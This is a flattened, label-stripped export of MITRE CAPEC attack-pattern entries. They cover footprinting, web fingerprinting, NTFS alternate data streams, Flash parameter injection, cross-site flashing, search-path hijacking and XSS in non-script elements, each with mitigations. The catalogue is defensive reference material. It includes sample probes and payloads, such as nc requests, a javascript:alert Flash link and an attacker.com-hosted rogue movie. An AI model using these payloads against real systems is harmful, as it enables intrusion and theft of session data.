No special resources are required for most variants of this attack. In some cases, tools are needed to better control the response of the targeted application to the modified file.
1000
Category
ChildOf
262
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker forces the target into a previous state in order to leverage potential weaknesses in the target dependent upon a prior configuration or state-dependent factors. Even in cases where an attacker may not be able to directly control the configuration of the targeted application, they may be able to reset the configuration to a prior state since many applications implement reset functions. Since these functions are usually intended as emergency features to return an application to a stable configuration if the current configuration degrades functionality, they may not be as strongly secured as other configuration options. The resetting of values is dangerous as it may enable undesired functionality, disable services, or modify access controls. At the very least this is a nuisance attack since the administrator will need to re-apply their configuration. At worst, this attack can open avenues for powerful attacks against the application, and, if it isn't obvious that the configuration has been reset, these vulnerabilities may be present a long time before they are notices.
The targeted application must have a reset function that returns the configuration of the application to an earlier state.
The reset functionality must be inadequately protected against use.
Medium
No special resources are required for execution of this attack. In some cases, the attacker may need special client applications or a given level of access to the application in order to execute the reset functionality.
1000
Attack Pattern
ChildOf
171
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker examines an available client application for the presence of sensitive information. This information may be stored in configuration files, embedded within the application itself, or stored in other ways. Sensitive information may include long-term keys, passwords, credit card or financial information, and other private material that the client uses in its interactions with the server. While servers are (hopefully) protected with professional security administrators, most users may be less skilled at protecting their clients. As a result, the user client may represent a weak link that an attacker can exploit. If an attacker can gain access to a client installation, they may be able to detect and lift sensitive information that could be used directly (such as financial information), or allow the attacker to subvert future communication between the client and the server. In some cases, it may not even be necessary to gain access to another user's installation - if all instances of the client software are embedded with the same sensitive information (for example, long term keys for communication with the server) then the attacker must simply find a way to gain their own copy of the client in order to perform this attack.
The client application installation must retain sensitive information locally. Moreover, it must fail to adequately protect this information against viewing by an attacker. Encrypting the information would thwart this type of attack, but only if the key used to encrypt this information was not itself locally accessible.
Medium
Depending on the details of the attack, the attacker may require access to a targeted user's installation of the client. Alternatively, the attacker may need to acquire any instance of the client.
642
Targeted
311
Targeted
1000
Attack Pattern
ChildOf
189
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker exploits the functionality of Microsoft NTFS Alternate Data Streams (ADS) to undermine system security. ADS allows multiple "files" to be stored in one directory entry referenced as filename:streamname. One or more alternate data streams may be stored in any file or directory. Normal Microsoft utilities do not show the presence of an ADS stream attached to a file. The additional space for the ADS is not recorded in the displayed file size. The additional space for ADS is accounted for in the used space on the volume. An ADS can be any type of file. ADS are copied by standard Microsoft utilities between NTFS volumes. ADS can be used by an attacker or intruder to hide tools, scripts, and data from detection by normal system utilities. Many anti-virus programs do not check for or scan ADS. Windows Vista does have a switch (-R) on the command line DIR command that will display alternate streams.
The target must be running the Microsoft NTFS file system.
Medium
No special tools or resources are required. The attacker must have command line or programmatic access to the target's files system with write/read permissions.
Design: Use FAT file systems which do not support Alternate Data Streams.
Implementation: Use Vista dir with the -R switch or utility to find Alternate Data Streams and take appropriate action with those discovered.
Implementation: Use products that are Alternate Data Stream aware for virus scanning and system security operations.
212
Secondary
69
Targeted
1000
Attack Pattern
ChildOf
272
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker engages in probing and exploration activity to identify constituents and properties of the target. Footprinting is a general term to describe a variety of information gathering techniques, often used by attackers in preparation for some attack. It consists of using tools to learn as much as possible about the composition, configuration, and security mechanisms of the targeted application, system or network. Information that might be collected during a footprinting effort could include open ports, applications and their versions, network topology, and similar information. While footprinting is not intended to be damaging (although certain activities, such as network scans, can sometimes cause disruptions to vulnerable applications inadvertently) it may often pave the way for more damaging attacks.
Request Footprinting
The attacker examines the website information and source code of the website and uses automated tools to get as much information as possible about the system and organization.
Open Source Footprinting: Examine the website about the organization and skim through the webpage's HTML source to look for comments.
env-Web
Network Enumeration: Perform various queries (Registrar Query, Organizational Query, Domain Query, Network Query, POC Query) on the many whois databases found on the internet to identify domain names and associated networks.
env-Web
DNS Interrogation: Once basic information is gathered the attack could begin to query DNS.
env-Web
Other Techniques: Use ping sweep, TCP scan, UDP scan, OS Identification various techniques to gain more information about the system and network.
env-Web
The response contains sensitive information such as ports open, network block, server version etc.
env-Web
The response does not contain sensitive information about the system and network.
env-Local
A list of sensitive information about the system and network.
There is no information available about the system and network.
The server may detect a large amount of port scan request, illegal ICMP and TCP packets.
None. Any system or network that can be detected can be footprinted. However, some configuration choices may limit the useful information that can be collected during a footprinting attack.
Very Low
High
Protocol Manipulation
Injection
Analysis
Social Engineering
In this example let us look at the website http://www.example.com to get much information we can about Alice. From the website, we find that Alice also runs foobar.org. We type in www example.com into the prompt of the Name Lookup window in a tool, and our result is this IP address: 192.173.28.130 We type the domain into the Name Lookup prompt and we are given the same IP. We can safely say that example and foobar.org are hosted on the same box. But if we were to do a reverse name lookup on the IP, which domain will come up? www.example.com or foobar.org? Neither, the result is nijasvspirates.org. So nijasvspirates.org is the name of the box hosting 31337squirrel.org and foobar.org. So now that we have the IP, let's check to see if nijasvspirates is awake. We type the IP into the prompt in the Ping window. We'll set the interval between packets to 1 millisecond. We'll set the number of seconds to wait until a ping times out to 5. We'll set the ping size to 500 bytes and we'll send ten pings. Ten packets sent and ten packets received. nijasvspirates.org returned a message to my computer within an average of 0.35 seconds for every packet sent. nijasvspirates is alive. We open the Whois window and type nijasvspirates.org into the Query prompt, and whois.networksolutions.com into the Server prompt. This means we'll be asking Network Solutions to tell us everything they know about nijasvspirates.org. The result is this laundry list of info: Registrant: FooBar (nijasvspirates -DOM) p.o.box 11111 SLC, UT 84151 US Domain Name: nijasvspirates.ORG Administrative Contact, Billing Contact: Smith, John jsmith@anonymous.net FooBar p.o.box 11111 SLC, UT 84151 555-555-6103 Technical Contact: Johnson, Ken kj@fierymonkey.org fierymonkey p.o.box 11111 SLC, UT 84151 555-555-3849 Record last updated on 17-Aug-2001. Record expires on 11-Aug-2002. Record created on 11-Aug-2000. Database last updated on 12-Dec-2001 04:06:00 EST. Domain servers in listed order: NS1. fierymonkey.ORG 192.173.28.130 NS2. fierymonkey.ORG 64.192.168.80 A corner stone of footprinting is Port Scanning. Let's port scan nijasvspirates.org and see what kind of services are running on that box. We type in the nijasvspirates IP into the Host prompt of the Port Scan window. We'll start searching from port number 1, and we'll stop at the default Sub7 port, 27374. Our results are: 21 TCP ftp 22 TCP ssh SSH-1.99-OpenSSH_2.30 25 TCP smtp 53 TCP domain 80 TCP www 110 TCP pop3 111 TCP sunrpc 113 TCP ident Just by this we know that Alice is running a website and email, using POP3, SUNRPC (SUN Remote Procedure Call), and ident.
Low
Attacker knows how to send HTTP request, run the scan tool.
The attacker requires a variety of tools to collect information about the target. These include port and network scanners and tools to analyze responses from applications to determine version and configuration information. Footprinting a system adequately may also take a few days if the attacker wishes the footprinting attempt to go undetected.
Configuration: Keep patches up to date by installing weekly or daily if possible.
Configuration: Shut down unnecessary services/ports.
Policy: Change default passwords by choosing strong passwords.
Implementation: Curtail unexpected input.
Design: Encrypt and password-protect sensitive data.
Policy: Place offline any information that has the potential to identify and compromise your organization's security such as access to business plans, formulas, and proprietary documents.
Confidentiality
"Varies by context"
Information Leakage
497
Targeted
200
Targeted
202
Targeted
538
Targeted
311
Targeted
312
Targeted
319
Targeted
276
Targeted
Exploitation
Medium
Low
Low
Client-Server
n-Tier
SOA
All
All
All
Manic Velocity
Footprinting And The Basics Of Hacking
Web Textfiles
http://web.textfiles.com/hacking/footprinting.txt
Eddie Sutton
Footprint: What Is And How Do You Erase Them
http://www.infosecwriters.com/text_resources/pdf/Footprinting.pdf
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 2: Scanning, pp. 38-39
6th Edition
McGraw Hill
2009
Gordon "Fyodor" Lyon
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
Section 3.1 Introduction, pg. 47
3rd "Zero Day" Edition,
Insecure.com LLC, ISBN: 978-0-9799587-1-7
2008
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attack of this type exploits a system's configuration that allows an attacker to either directly access an executable file, for example through shell access; or in a possible worst case allows an attacker to upload a file and then execute it. Web servers, ftp servers, and message oriented middleware systems which have many integration points are particularly vulnerable, because both the programmers and the administrators must be in synch regarding the interfaces and the correct privileges for each interface.
System's configuration must allow an attacker to directly access executable files or upload files to execute. This means that any access control system that is supposed to mediate communications between the subject and the object is set incorrectly or assumes a benign environment.
Very High
High
Modification of Resources
API Abuse
Consider a directory on a web server with the following permissions
drwxrwxrwx 5 admin public 170 Nov 17 01:08 webroot
This could allow an attacker to both execute and upload and execute programs' on the web server. This one vulnerability can be exploited by a threat to probe the system and identify additional vulnerabilities to exploit.
Low
To identify and execute against an over-privileged system interface
Ability to communicate synchronously or asynchronously with server that publishes an over-privileged directory, program, or interface. Optionally, ability to capture output directly through synchronous communication or other method such as FTP.
Design: Enforce principle of least privilege
Design: Run server interfaces with a non-root account and/or utilize chroot jails or other configuration techniques to constrain privileges even if attacker gains some limited access to commands.
Implementation: Perform testing such as pen-testing and vulnerability scanning to identify directories, programs, and interfaces that grant direct access to executables.
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Integrity
Modify application data
Confidentiality
Read application data
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Payload delivered through standard communication protocols.
Command(s) executed directly on host
Client machine and client network
Enables attacker to execute server side code with any commands that the program owner has privileges to.
732
Targeted
285
Targeted
272
Targeted
59
Targeted
282
Targeted
275
Targeted
264
Targeted
270
Targeted
693
Targeted
1000
Attack Pattern
ChildOf
1
1000
Category
ChildOf
233
1000
Attack Pattern
ChildOf
165
Penetration
High
Medium
Low
All
All
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker sends a series of probes to a web application in order to elicit version-dependent and type-dependent behavior that assists in identifying the target. An attacker could learn information such as software versions, error pages, and response headers, variations in implementations of the HTTP protocol, directory structures, and other similar information about the targeted service. This information can then be used by an attacker to formulate a targeted attack plan. While web application fingerprinting is not intended to be damaging (although certain activities, such as network scans, can sometimes cause disruptions to vulnerable applications inadvertently) it may often pave the way for more damaging attacks.
Request fingerprinting
Use automated tools or send web server specific commands to web server and wait for server's response.
Use automated tools or send web server specific commands to web server and then receive server's response.
env-Web
HTTP response headers contain fingerprinting sensitive fields indicating server's vendors and versions.
env-Web
HTTP response headers do not contain fingerprinting sensitive fields indicating server's vendors and versions.
env-Web
A list of fingerprinting sensitive information from HTTP response headers.
There is no HTTP response header information available.
Web application firewall may detect a large amount of HTTP requests from the same host.
Increase the accuracy of server fingerprinting of Web servers
Attacker usually needs to send several different commands to accurately identify the web server. Attacker can also use automated tools to send requests to the server. The responses of the server may be different in terms of protocol behavior.
Observe the ordering of the several HTTP response headers. The ordering of the header of each server may have unique identities.
env-Web
Send bad requests or requests of nonexistent pages to the server.
env-Web
Attacker takes existing automated tools to recognize the type and the version of the web server in use.
env-Web
Find different inner reordering of headers in HTTP response due to different versions of the server.
env-Web
Every server answers to a Bad request in a different way due to different versions of the server.
env-Web
Find signatures of web servers in database of automated tools.
env-Web
HTTP response headers all look like identical.
env-Web
The attacker successfully identifies server's vendors and versions.
Alert on standard fingerprinting probes. Use the same vulnerability catalogs that adversaries use.
Alert on bad request.
Obfuscate server fields of HTTP response.
Hide inner ordering of HTTP response header.
Customizing HTTP error codes such as 404 or 500.
Identify Web Application Software
After the web server platform software has been identified, the attacker start to identify web application technologies such as ASP, .NET, PHP and Java on the server.
Examine the file name extensions in URL, for example .php indicates PHP script interfaced with Apache server.
env-Web
Examine the HTTP Response Headers. This may leak information about software signatures
env-Web
Examine Cookies that may contain server's software information.
env-Web
Check error pages.
env-Web
File name extensions can be found in the URL.
env-Web
HTTP Response headers show software version.
env-Web
Cookies leak information for server's version.
env-Web
From error messages, the stack trace of errors and exceptions may also explicitly tell application software information.
env-Web
File name extensions can be found in the URL.
HTTP Response headers show software version.
Cookies leak information for server's version.
From error messages, the stack trace of errors and exceptions may also explicitly tell application software information.
The attacker successfully identifies web application software vendors and versions.
Alert on standard fingerprinting probes. Use the same vulnerability catalogs that adversaries use.
Alert on bad request.
Hide URL file extension.
Hide HTTP response header software information filed.
Hide cookie's software information filed
Appropriately deal with error messages.
Identify Backend Database Version
Determining the database engine type can assist attackers' attempt to successfully execute SQL injection. Some database API such as ODBC will show a database type as part of the driver information when reporting an error.
Use tools to send bogus SQL query to the server and check error pages.
env-Web
Get error messages from SQL response.
env-Web
No error messages.
env-Web
The attacker successfully identifies database type from error messages.
The attacker fails to identify database type from error messages.
Alert on standard fingerprinting probes. Use the same vulnerability catalogs that adversaries use.
Alert on bad request.
Obfuscate database type in Database API's error message.
Any web application can be fingerprinted. However, some configuration choices can limit the useful information an attacker may collect during a fingerprinting attack.
Low
High
Analysis
An attacker sends malformed requests or requests of nonexistent pages to the server. Consider the following HTTP responses.
Response from Apache 1.3.23
$ nc apache.server.com
80 GET / HTTP/3.0
HTTP/1.1 400 Bad Request
Date: Sun, 15 Jun 2003 17:12: 37 GMT
Server: Apache/1.3.23
Connection: close
Transfer: chunked
Content-Type: text/HTML; charset=iso-8859-1
Response from IIS 5.0
$ nc iis.server.com 80
GET / HTTP/3.0
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Content-Location: http://iis.example.com/Default.htm
Date: Fri, 01 Jan 1999 20:14: 02 GMT
Content-Type: text/HTML
Accept-Ranges: bytes Last-Modified: Fri, 01 Jan 1999 20:14: 02 GMT
ETag: W/e0d362a4c335be1: ae1
Content-Length: 133
[R.170.2]
Low
Attacker knows how to send HTTP request, SQL query to a web application.
While simple fingerprinting can be accomplished with only a web browser, for more thorough fingerprinting an attacker requires a variety of tools to collect information about the target. These tools might include protocol analyzers, web-site crawlers, and fuzzing tools. Footprinting a service adequately may also take a few days if the attacker wishes the footprinting attempt to go undetected.
Implementation: Obfuscate server fields of HTTP response.
Implementation: Hide inner ordering of HTTP response header.
Implementation: Customizing HTTP error codes such as 404 or 500.
Implementation: Hide URL file extension.
Implementation: Hide HTTP response header software information filed.
Implementation: Hide cookie's software information filed.
Implementation: Appropriately deal with error messages.
Implementation: Obfuscate database type in Database API's error message.
Confidentiality
"Varies by context"
Information Leakage
Any HTTP Request transport variables (HTTP Headers, etc.)
HTTP request and response
Leakage server's information.
1000
Attack Pattern
ChildOf
541
Reconnaissance
Medium
Low
Low
Web
Client-Server
n-Tier
All
All
All
Saumil Shah
An Introduction to HTTP fingerprinting
http://net-square.com/httprint/httprint_paper.html
OWASP Testing Guide
Testing for Web Application Fingerprint (OWASP-IG-004)
v4 [DRAFT]
The Open Web Application Security Project (OWASP)
http://www.owasp.org/index.php/Testing_for_Web_Application_Fingerprint_%28OWASP-IG-004%29
HTTP 1.1 Specification (RFC 2616)
IETF RFC
http://www.ietf.org/rfc/rfc2616.txt
WASC Threat Classification 2.0
WASC-45 - Fingerprinting
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/Fingerprinting
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker manipulates variables used by an application to perform a variety of possible attacks. This can either be performed through the manipulation of function call parameters or by manipulating external variables, such as environment variables, that are used by an application. Changing variable values is usually undertaken as part of another attack; for example, a path traversal (inserting relative path modifiers) or buffer overflow (enlarging a variable value beyond an application's ability to store it).
The targeted application must rely on external variables (e.g. environment variables) or user-controlled variables (e.g. call parameters) in such a way that malicious manipulation of them can subvert functionality.
Medium
The attacker must be able to manipulate the targeted variable. For some variables, such as URL-encoded parameters in a web call, this is very simple. For others, such as a system's environment variables, this can require additional resources or capabilities.
Design: Range, size and value and consistency verification for any arguments supplied to application from external sources and devise appropriate error response.
Design: Ensure that variables that should not be manipulated by a user are not accessible to them.
471
Targeted
20
Targeted
1000
Category
ChildOf
262
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker is able to disguise one action for another and therefore trick a user into initiating one type of action when they intend to initiate a different action. For example, a user might be led to believe that clicking a button will submit a query, but in fact it downloads software. Attackers may perform this attack through social means, such as by simply convincing a victim to perform the action or relying on a user's natural inclination to do so, or through technical means, such as a clickjacking attack where a user sees one interface but is actually interacting with a second, invisible, interface.
The victim must be convinced into performing the decoy action.
Very High
The attacker must have enough control over a user's interface to present them with a decoy action as well as the actual malicious action. Simple versions of this attack can be performed using web pages requiring only that the attacker be able to host (or control) content that the user visits.
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker injects values to global parameters into a Flash movie embedded in an HTML document. These injected parameters are controlled through arguments in the URL used to access the embedding HTML document. As such, this is a form of HTTP parameter injection, but the abilities granted to the Flash document (such as access to a page's document model, including associated cookies) make this attack more flexible. The injected parameters can allow the attacker to control other objects within the Flash movie as well as full control over the parent document's DOM model.
Spider
Using a browser or an automated tool, an attacker records all instances of HTML documents that have embedded Flash movies. If there is an embedded Flash movie, he lists how to pass global parameters to the Flash movie from the embedding object.
Use an automated tool to record all instances of URLs which have embedded Flash movies and list the parameters passing to the Flash movie.
env-Web
Use a browser to manually explore the website to see whether the HTML document has embedded Flash movies or not and list the parameters passing to the Flash movie.
env-Web
The HTML document has embedded Flash movies.
env-Web
The HTML file doesn't appear to contain Flash movies, but Ajax request seems possible and could insert Flash movies.
env-Web
A list of URLs which has embedded Flash movies and the list of parameters passing to the Flash movies.
Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them).
Determine the application susceptibility to Flash parameter injection
Determine the application susceptibility to Flash parameter injection. For each URL identified in the Explore phase, the attack attempts to use various techniques such as DOM based, reflected, flashvars, persistent attacks depending on the type of parameter passed to the embedded Flash movie.
When the JavaScript 'document.location' variable is used as part of parameter, inject '#' and payload into the parameter in the URL.
env-Web
When the name of the Flash movie is exposed as a form or a URL parameter, the attacker injects '?' and payload after the movie name in the URL to overrides some global value.
env-Web
When the arguments passed in the 'flashvars' attributes, the attacker injects '&' and payload in the URL.
env-Web
If some of the attributes of the <object> tag are received as parameters, the 'flashvars' attribute is injected into the <object> tag without the creator of the Web page ever intending to allow arguments to be passed into the Flash file.
env-Web
If shared objects are used to save data that is entered by the user persistent Flash parameter injection may occur, with malicious code being injected into the Flash file and executed, every time the Flash movie is loaded.
env-Web
At least one URL is found susceptible to flash parameter injection.
No URL is found susceptible to injection.
User input must be sanitized according to context before reflected back to the user.
Medium
High
Injection
The following are examples for different types of parameters passed to the Flash movie.
DOM-based Flash parameter injection
<object>
<embed src="myFlash.swf" flashvars="location=http://example.com/index.htm#&globalVar=e-v-i-l"></embed>
</object>
Passing parameter in an embedded URI
<object type="application/x-shockwave-flash" data="myMovie.swf?globalVar=e-v-i-l" ></object>
Passing parameter in flashvars
<object type="application/x-shockwaMovie.swf" ve-flash" data="my flashvars="language=English&globalVar=e-v-i-l"></object>
Persistent Flash Parameter Injection
// Create a new shared object or read an existing one
mySharedObject = SharedObject.getLocal("flashToLoad");
if (_root.flashfile == undefined) {
// Check whether there is a shared object saved
if (mySharedObject.data.flash == null) {
// Set a default
value _root.flashfile = "defaultFlash.swf";
} else {
// Read the flash file to load from the shared object
_root.flashfile = mySharedObject.data.flash;
}
}
// Store the flash file's name in the shared object
mySharedObject.data.flash = _root.flashfile;
// Load the flash file
getURL(_root.flashfile);
If an unsuspecting user is lured by an attacker to click on link like this: http://example.com/vulnerable.swf?flashfile=javascript:alert(document.domain)
The result will be not merely a one-time execution of the JavaScript code in the victim's browser in the context of the domain with the vulnerable Flash file, but every time the Flash is loaded, whether by direct reference or embedded inside the same domain, the JavaScript will be executed again.
Medium
The attacker need inject values into the global parameters to the Flash movie and understand the parent HTML document DOM structure. The attacker need be smart enough to convince the victim to his crafted link.
The attacker must convince the victim to click their crafted link.
User input must be sanitized according to context before reflected back to the user. The JavaScript function 'encodeURI' is not always sufficient for sanitizing input intended for global Flash parameters. Extreme caution should be taken when saving user input in Flash cookies. In such cases the Flash file itself will need to be fixed and recompiled, changing the name of the local shared objects (Flash cookies).
Confidentiality
"Varies by context"
Information Leakage
Authorization
Execute unauthorized code or commands
Run Arbitrary Code
User-controllable URL used as global parameter for Flash movies
Crafted value for global parameter and special characters.
The embedded Flash movie and the parent HTML document.
The injected parameters can allow the attacker to get full control over the parent document's DOM model as well as other objects within the Flash movie.
184
Targeted
185
Targeted
697
Targeted
CAPEC-246
Cross-Site Scripting using Flash
1000
Attack Pattern
ChildOf
137
http://capec.mitre.org/data/definitions/137.html
1000
Attack Pattern
CanPrecede
246
1000
Attack Pattern
CanAlsoBe
460
Penetration
Exploitation
High
High
Medium
Client-Server
n-Tier
All
All
All
Yuval B.
Ayal Y.
Adi S.
Flash Parameter Injection: A Security Advisory
IBM Rational Security Team
September 24, 2008
http://blog.watchfire.com/FPI.pdf
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker exploits a weakness in input validation on the target to force arbitrary code to be retrieved from a remote location and executed. This differs from code injection in that code injection involves the direct inclusion of code while code inclusion involves the addition or replacement of a reference to a code file, which is subsequently loaded by the target and used as part of the code of some application. One example of this sort of attack is PHP file include attacks where the parameter of an include() function is set by a variable that an attacker is able to control. The result is that arbitrary code could be loaded into the PHP application and executed.
The target application must include external code/libraries that are executed when the application runs and the attacker must be able to influence the specific files that get included.
The victim must run the targeted application, possibly using the crafted parameters that the attacker uses to identify the code to include.
Very High
The attacker may need to be able to host code modules if they wish their own code files to be included.
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker manipulates files or settings external to a target application which affect the behavior of that application. For example, many applications use external configuration files and libraries - modification of these entities or otherwise affecting the application's ability to use them would constitute a configuration/environment manipulation attack.
The target application must consult external files or configuration controls to control its execution. All but the very simplest applications meet this requirement.
Medium
The attacker must have the access necessary to affect the files or other environment items the targeted application uses for its operations.
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker exploits file location algorithms in an operating system or application by creating a file with the same name as a protected or privileged file. The attacker could manipulate the system if the attacker-created file is trusted by the operating system or an application component that attempts to load the original file. Applications often load or include external files, such as libraries or configuration files. These files should be protected against malicious manipulation. However, if the application only uses the name of the file when locating it, an attacker may be able to create a file with the same name and place it in a directory that the application will search before the directory with the legitimate file is searched. Because the attackers' file is discovered first, it would be used by the target application. This attack can be extremely destructive if the referenced file is executable and/or is granted special privileges based solely on having a particular name.
The target application must exclude external files. Most non-trivial applications meet this criterion.
The target application does not verify that a located file is the one it was looking for through means other than the name. Many applications fail to perform checks of this type.
The directories the target application searches to find the included file include directories writable by the attacker which are searched before the protected directory containing the actual files. It is much less common for applications to meet this criterion, but if an attacker can manipulate the application's search path (possibly by controlling environmental variables) then they can force this criterion to be met.
Very High
The attacker must have sufficient access to place an arbitrarily named file somewhere early in the application's search path.
1000
Attack Pattern
ChildOf
165
SecurityInnovation
http://www.securityinnovation.com/library/attacks/implementation.shtml
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker is able to trick the victim into executing a Flash document that passes commands or calls to a Flash player browser plugin, allowing the attacker to exploit native Flash functionality in the client browser. This attack pattern occurs where an attacker can provide a crafted link to a Flash document (SWF file) which, when followed, will cause additional malicious instructions to be executed. The attacker does not need to serve or control the Flash document. The attack takes advantage of the fact that Flash files can reference external URLs. If variables that serve as URLs that the Flash application references can be controlled through parameters, then by creating a link that includes values for those parameters, an attacker can cause arbitrary content to be referenced and possibly executed by the targeted Flash application.
Identification
Using a browser or an automated tool, an attacker records all instances of URLs (or partial URL such as domain) passed to a flash file (SWF).
Use an automated tool to record the variables passed to a flash file.
env-Web
Use a browser to manually explore the website and analyze how the flash file receive variables, e.g. JavaScript using SetVariable/GetVariable, HTML FlashVars param tag, etc.
env-Web
Use decompilers to retrieve the flash source code and record all user-controllable variables passed to a loadMovie* directive.
env-Web
A URL is passed as parameter to a flash file (SWF).
env-Web
No variable appear on the URL. Even though none appear, the flash movie may still use them if they are provided.
env-Web
Application doesn't use variable to specify what URL to load remote flash movies from.
env-Web
A list of flash files, with their corresponding parameters is created by the attacker.
Attempt to inject a remote flash file
The attacker makes use of a remotely available flash file (SWF) that generates a uniquely identifiable output when executed inside the targeted flash file.
Modify the variable of the SWF file that contains the remote movie URL to the attacker controlled flash file.
env-Web
The attacker's flash movie is being executed in the targeted movie.
env-Web
The targeted flash movie doesn't appear to allow the inclusion of flash movies from untrusted domains (specified in the crossdomain.xml or in the flash movie itself).
env-Web
The attacker's flash movie can access the targeted flash movie internal variables
The attacker's flash movie cannot access any content of the targeted flash movie
Access or Modify Flash Application Variables
As the attacker succeeds in exploiting the vulnerability, he targets the content of the flash application to steal variable content, password, etc.
Develop malicious Flash application that is injected through vectors identified during the Experiment Phase and loaded by the victim browser's flash plugin and sends document information to the attacker.
env-Web
Develop malicious Flash application that is injected through vectors identified during the Experiment Phase and takes commands from an attacker's server and then causes the flash application to execute appropriately.
env-Web
The attacker gets the user's session identifiers or other type of credentials
The attacker gets the content of the variables used in the flash application
The attacker causes the flash application to be remotely controlled
Apply appropriate configuration settings for cross domain flash applications in the crossdomain.xml file.
Apply appropriate configuration settings for cross domain flash applications inside the flash application.
Execute JavaScript in victim's browser
When the attacker targets the current flash application, he can choose to inject JavaScript in the client's DOM and therefore execute cross-site scripting attack.
Develop malicious JavaScript that is injected from the rogue flash movie to the targeted flash application through vectors identified during the Experiment Phase and loaded by the victim's browser.
env-Web
The attacker is able to execute a DOM based cross-site scripting attack on the victim.
Apply appropriate configuration settings for cross domain flash applications in the crossdomain.xml file.
Apply appropriate configuration settings for cross domain flash applications inside the flash application.
The targeted Flash application must reference external URLs and the locations thus referenced must be controllable through parameters. The Flash application must fail to sanitize such parameters against malicious manipulation. The victim must follow a crafted link created by the attacker.
Medium
Medium
Injection
The attacker tries to get his malicious flash movie to be executed in the targeted flash application. The malicious file is hosted on the attacker.com domain and the targeted flash application is hosted on example.com The crossdomain.xml file in the root of example.com allows all domains and no specific restriction is specified in the targeted flash application. When the attacker injects his malicious file in the vulnerable flash movie, the rogue flash application is able to access internal variables and parameter of the flash movie.
Medium
knowledge of Flash internals, parameters and remote referencing.
Implementation: Only allow known URL to be included as remote flash movies in a flash application
Configuration: Properly configure the crossdomain.xml file to only include the known domains that should host remote flash movies.
Integrity
Modify files or directories
Confidentiality
Read files or directories
Integrity
Modify application data
Confidentiality
Read application data
Authorization
Execute unauthorized code or commands
Run Arbitrary Code
Accountability
Authentication
Authorization
Non-Repudiation
Gain privileges / assume identity
Access_Control
Authorization
Bypass protection mechanism
Externally controllable external URL references within a flash file (SWF).
Any HTTP Request transport variables (GET, POST, Headers, etc.).
Flash plugin inside the client web browser where script is executed.
Client web browser may be used to steal session data, passwords and other information which transit through the vulnerable flash application.
1000
Attack Pattern
ChildOf
182
http://capec.mitre.org/data/definitions/18.html
Exploitation
High
High
Low
Web
Client-Server
n-Tier
All
All
All
Stefano Di Paola
Testing Flash Applications
2007
http://www.wisec.it/en/Docs/flash_App_testing_Owasp07.pdf
OWASP Testing Guide
Testing for Cross site flashing (OWASP-DV-004)
v4 [DRAFT]
The Open Web Application Security Project (OWASP)
http://www.owasp.org/index.php/Testing_for_Cross_site_flashing_(OWASP-DV-004)
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker is able to discover and query Micro-services at a web location and thereby expose the Micro-services to further exploitation by gathering information about their implementation and function. Micro-services in web pages allow portions of a page to connect to the server and update content without needing to cause the entire page to update. This allows user activity to change portions of the page more quickly without causing disruptions elsewhere. However, these micro-services may not be subject to the same level of security review as other forms of content. For example, a micro-service that posts requests to a server that are turned into SQL queries may not adequately protect against SQL-injection attacks. As a result, micro-services may provide another vector for a range of attacks. It should be emphasized that the presence of micro-services does not necessarily make a site vulnerable to attack, but they do provide additional complexity to a web page and therefore may contain vulnerabilities that support other attack patterns.
The target site must use micro-services that interact with the server and one or more of these micro-services must be vulnerable to some other attack pattern.
Medium
The attacker usually needs to be able to invoke micro-services directly in order to control the parameters that are used in their attack. The attacker may require other resources depending on the nature of the flaw in the targeted micro-service.
1000
Attack Pattern
ChildOf
113
CAPEC Content Team
The MITRE Corporation
2014-06-23
This attack is a form of Cross-Site Scripting (XSS) where malicious scripts are embedded in elements that are not expected to host scripts such as image tags (<img>), comments in XML documents (< !-CDATA->), etc. These tags may not be subject to the same input validation, output validation, and other content filtering and checking routines, so this can create an opportunity for an attacker to tunnel through the application's elements and launch a XSS attack through other elements.
As with all remote attacks, it is important to differentiate the ability to launch an attack (such as probing an internal network for unpatched servers) and the ability of the remote attacker to collect and interpret the output of said attack.
Spider
Using a browser or an automated tool, an attacker records all entry points for inputs that happen to be reflected in a client-side non-script element. These non-script elements can be located in the HTML content (head, body, comments), in an HTML tag, XML, CSS, etc.
Use a spidering tool to follow and record all non-static links that are likely to have input parameters (through forms, URL, fragments, etc.) actively used by the Web application.
env-Web
Use a proxy tool to record all links visited during a manual traversal of the web application.
env-Web
Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
env-Web
At least one input is reflected in a non-script element.
env-Web
Using URL rewriting, parameters may be part of the URL path and still used in a non-script element.
env-Web
No parameters appear to be used on the current page. Even though none appear, the web application may still use them if they are provided.
env-Web
Applications that have only static pages or that simply present information without accepting input are unlikely to be susceptible.
env-Web
A list of URLs, with their corresponding parameters (POST, GET, COOKIE, etc.) is created by the attacker. These parameters are all used in, possibly, client-side non-scripts elements.
A list of application user interface entry fields is created by the attacker.
A list of resources accessed by the application is created by the attacker.
Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them).
Create links on some pages that are visually hidden from web browsers. Using iframes, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application.
